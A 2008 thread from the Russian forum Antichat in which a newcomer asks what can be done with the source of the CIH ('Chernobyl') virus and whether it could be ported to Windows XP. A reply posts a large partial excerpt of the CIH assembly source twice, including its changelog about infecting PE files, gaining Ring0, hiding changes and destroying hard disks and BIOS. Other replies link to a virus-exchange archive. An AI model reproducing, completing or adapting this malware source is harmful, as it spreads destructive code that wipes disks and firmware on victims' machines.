Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.04.2008, 20:01
|
|
Новичок
Регистрация: 11.04.2008
Сообщений: 2
Провел на форуме:
4656
Репутация:
0
|
|
Исходник Cih
Есть исходник вируса "Чернобыль" ! Что с ним можно сделать, зная ассемблер?
|
|
|
29.04.2008, 20:03
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
зная асм можно свой пых написать
|
|
|
|
29.04.2008, 20:11
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028
Репутация:
2371
|
|
Pyfz jcty,kth vj;yj yjgtcnm dbbyb ge[f
|
|
|
|
29.04.2008, 20:13
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от Isis
Pyfz jcty,kth vj;yj yjgtcnm dbbyb ge[f
а че норм налевайй а то уйду 
|
|
|
|
29.04.2008, 20:18
|
|
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904
Репутация:
1393
|
|
Код:
; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 E-mail : WinCIH.Tatung@usa.net *
; * Modification Time : 06/01/1998 Version : 1.5 *
; * *
; * Turbo Assembler Version 5.0 : Tasm /m cih *
; * Turbo Link Version 5.01 : Tlink /3 /t cih, cih.exe *
; * *
; *==========================================================================*
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************
; * v1.5 1. Full Modify the Bug : Change Harddisk Killing Port *
; * 2. Modify Virus Version Copyright. *
; * 06/01/1998 3. Clear Garbage in Source Code. *
; * 4. The Virus "Small" Size in 10xx Bytes. *
; ****************************************************************************
.586
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
; ****************************************************************************
; * My Virus Game *
; ****************************************************************************
; *********************************************************
; * Constant Define *
; *********************************************************
TRUE = 1
FALSE = 0
DEBUG = TRUE
IF DEBUG
FirstKillHardDiskNumber = 82h
HookExceptionNumber = 06h
ELSE
FirstKillHardDiskNumber = 81h
HookExceptionNumber = 04h
ENDIF
FileNameBufferSize = 7fh
; *********************************************************
; *********************************************************
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax, fs:[ebx]
call @0
@0:
pop ebx
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber; GenerateException
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
push esi
mov esi, eax
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection; ZF = 1
jmp LoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber; GenerateException Again
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4; App Entry Point to Stack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx; Set the Mark of My Virus Exist in System
push 00000000fh;
push ecx ;
push 0ffffffffh;
push ecx ;
push ecx ;
push ecx ;
push 000000001h;
push 000000002h;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h; Use EAX, ECX, EDX, and flags
add esp, 08h*04h
xchg edi, eax; EDI = SystemMemory Start Address
lea eax, MyVirusStart-@2[esi]
iretd; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
dd 00400067h; Use EAX, ECX, EDX, and flags
mov dr0, eax; Save OldFileSystemApiHook Address
pop eax; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:
push ebx
call @4;
@4: ;
pop ebx; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-@4;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h; Use EAX, ECX, EDX, and flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax; Adjust OldFileSystemApiHook Address
pop eax
pop ebx
ret
|
|
|
|
29.04.2008, 20:19
|
|
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904
Репутация:
1393
|
|
Код:
; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 E-mail : WinCIH.Tatung@usa.net *
; * Modification Time : 06/01/1998 Version : 1.5 *
; * *
; * Turbo Assembler Version 5.0 : Tasm /m cih *
; * Turbo Link Version 5.01 : Tlink /3 /t cih, cih.exe *
; * *
; *==========================================================================*
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************
; * v1.5 1. Full Modify the Bug : Change Harddisk Killing Port *
; * 2. Modify Virus Version Copyright. *
; * 06/01/1998 3. Clear Garbage in Source Code. *
; * 4. The Virus "Small" Size in 10xx Bytes. *
; ****************************************************************************
.586
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
; ****************************************************************************
; * My Virus Game *
; ****************************************************************************
; *********************************************************
; * Constant Define *
; *********************************************************
TRUE = 1
FALSE = 0
DEBUG = TRUE
IF DEBUG
FirstKillHardDiskNumber = 82h
HookExceptionNumber = 06h
ELSE
FirstKillHardDiskNumber = 81h
HookExceptionNumber = 04h
ENDIF
FileNameBufferSize = 7fh
; *********************************************************
; *********************************************************
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax, fs:[ebx]
call @0
@0:
pop ebx
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber; GenerateException
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
push esi
mov esi, eax
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection; ZF = 1
jmp LoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber; GenerateException Again
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4; App Entry Point to Stack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx; Set the Mark of My Virus Exist in System
push 00000000fh;
push ecx ;
push 0ffffffffh;
push ecx ;
push ecx ;
push ecx ;
push 000000001h;
push 000000002h;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h; Use EAX, ECX, EDX, and flags
add esp, 08h*04h
xchg edi, eax; EDI = SystemMemory Start Address
lea eax, MyVirusStart-@2[esi]
iretd; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
dd 00400067h; Use EAX, ECX, EDX, and flags
mov dr0, eax; Save OldFileSystemApiHook Address
pop eax; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection = offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:
push ebx
call @4;
@4: ;
pop ebx; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-@4;
push ebx
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook = $
dd 00400068h; Use EAX, ECX, EDX, and flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax; Adjust OldFileSystemApiHook Address
pop eax
pop ebx
ret
|
|
|
|
29.04.2008, 20:20
|
|
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
Провел на форуме:
2360904
Репутация:
1393
|
|
http://forum.prologic.ws/index.php?showtopic=3318
|
|
|
|
29.04.2008, 20:26
|
|
Новичок
Регистрация: 11.04.2008
Сообщений: 2
Провел на форуме:
4656
Репутация:
0
|
|
Сообщение от z01b
http://forum.prologic.ws/index.php?showtopic=3318
Там исходник не полный!
1) У меня на много дольше!
2)Там даже заканчивается он оператором ret,что означает возвращение к данным перед началом этой функции,и асм так не кончается!
|
|
|
|
29.04.2008, 20:34
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
ищи
http://vx.netlux.org/
|
|
|
|
29.04.2008, 20:39
|
|
Новичок
Регистрация: 11.04.2008
Сообщений: 2
Провел на форуме:
4656
Репутация:
0
|
|
xcedz спасибо конечно,но я собственно спрашивал что можно сделать! Можно ли переписать CIH под XP ?
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Исходник rasdial для Delphi 7
|
Tapaceuka |
С/С++, C#, Delphi, .NET, Asm |
5 |
21.02.2008 20:17 |
|
нужен исходник dialupass
|
<Trash_man> |
С/С++, C#, Delphi, .NET, Asm |
3 |
18.01.2008 16:10 |
|
Исходник брутфорса для Icq
|
Gulik |
С/С++, C#, Delphi, .NET, Asm |
11 |
09.01.2008 14:08 |
|
нужен исходник трояа [assembler]
|
kair |
С/С++, C#, Delphi, .NET, Asm |
4 |
08.01.2008 03:26 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
